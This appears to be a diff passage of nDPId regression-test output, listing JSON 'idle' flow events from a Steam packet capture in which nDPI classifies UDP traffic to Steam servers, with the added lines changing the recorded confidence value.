-00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1357332165337,"flow_last_seen":1357332165370,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"69.28.145.171","src_port":45665,"dst_port":27018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} -00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1357332165238,"flow_last_seen":1357332165266,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"69.28.145.170","src_port":45665,"dst_port":27018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} -00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1357332164736,"flow_last_seen":1357332164761,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"69.28.145.172","src_port":45665,"dst_port":27018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} -00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1357332165337,"flow_last_seen":1357332165375,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"72.165.61.176","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} -00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1357332165188,"flow_last_seen":1357332165229,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"72.165.61.185","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} 
-00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1357332165137,"flow_last_seen":1357332165175,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"72.165.61.187","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} -00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1357332165037,"flow_last_seen":1357332165075,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"72.165.61.175","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} -00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1357332164987,"flow_last_seen":1357332165027,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"72.165.61.174","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} -00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1357332164888,"flow_last_seen":1357332164927,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"72.165.61.188","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} -00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1357332165288,"flow_last_seen":1357332165983,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":324,"flow_tot_l4_payload_len":992,"flow_avg_l4_payload_len":90,"midstream":0,"thread_ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"72.165.61.188","src_port":45665,"dst_port":27018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} 
-00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1357332165238,"flow_last_seen":1357332165277,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"72.165.61.175","src_port":45665,"dst_port":27018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} -00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1357332165187,"flow_last_seen":1357332165226,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"72.165.61.176","src_port":45665,"dst_port":27018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} -00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1357332165087,"flow_last_seen":1357332165125,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"72.165.61.174","src_port":45665,"dst_port":27018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} -00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1357332164936,"flow_last_seen":1357332164974,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"72.165.61.185","src_port":45665,"dst_port":27018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} -00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1357332164836,"flow_last_seen":1357332164873,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"72.165.61.187","src_port":45665,"dst_port":27018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} 
-00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1357332165037,"flow_last_seen":1357332165037,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"203.77.185.5","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} -00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1357332164887,"flow_last_seen":1357332164887,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"203.77.185.4","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} -00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1357332165188,"flow_last_seen":1357332165285,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"68.142.91.35","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} -00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1357332165288,"flow_last_seen":1357332165310,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"68.142.116.178","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} -00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1357332164888,"flow_last_seen":1357332164912,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"68.142.116.179","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} 
-00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1357332164886,"flow_last_seen":1357332164980,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"68.142.91.34","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} -00671{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1357332164737,"flow_last_seen":1357332164834,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"68.142.91.36","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} -00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1357332165187,"flow_last_seen":1357332165344,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"208.111.133.85","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} -00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1357332165088,"flow_last_seen":1357332165243,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"208.111.133.84","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} -00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1357332164936,"flow_last_seen":1357332165017,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"208.111.171.82","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} 
-00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1357332164787,"flow_last_seen":1357332164787,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"208.111.171.83","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} -00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1357332165138,"flow_last_seen":1357332165291,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"208.111.133.84","src_port":45665,"dst_port":27018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} -00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1357332164987,"flow_last_seen":1357332165148,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"208.111.133.85","src_port":45665,"dst_port":27018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} -00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1357332165238,"flow_last_seen":1357332165425,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"146.66.152.15","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} -00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1357332164986,"flow_last_seen":1357332165166,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"146.66.152.14","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} 
-00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1357332165088,"flow_last_seen":1357332165279,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"146.66.152.12","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} -00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1357332164937,"flow_last_seen":1357332165121,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"146.66.152.13","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} -00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1357332165337,"flow_last_seen":1357332165520,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"146.66.152.14","src_port":45665,"dst_port":27018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} -00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1357332165038,"flow_last_seen":1357332165230,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"146.66.152.15","src_port":45665,"dst_port":27018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} -00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1357332164737,"flow_last_seen":1357332164925,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"146.66.152.12","src_port":45665,"dst_port":27018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} 
-00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1357332164693,"flow_last_seen":1357332164876,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"146.66.152.13","src_port":45665,"dst_port":27018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} -00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1357332165087,"flow_last_seen":1357332165270,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"146.66.152.15","src_port":45665,"dst_port":27019,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} -00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1357332165237,"flow_last_seen":1357332165424,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"146.66.152.13","src_port":45665,"dst_port":27019,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} -00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1357332164836,"flow_last_seen":1357332165015,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"146.66.152.14","src_port":45665,"dst_port":27019,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} -00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1357332164693,"flow_last_seen":1357332164892,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"146.66.152.12","src_port":45665,"dst_port":27019,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} 
+00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1357332165137,"flow_last_seen":1357332165137,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"81.171.115.7","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} +00671{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1357332164737,"flow_last_seen":1357332164737,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"81.171.115.8","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 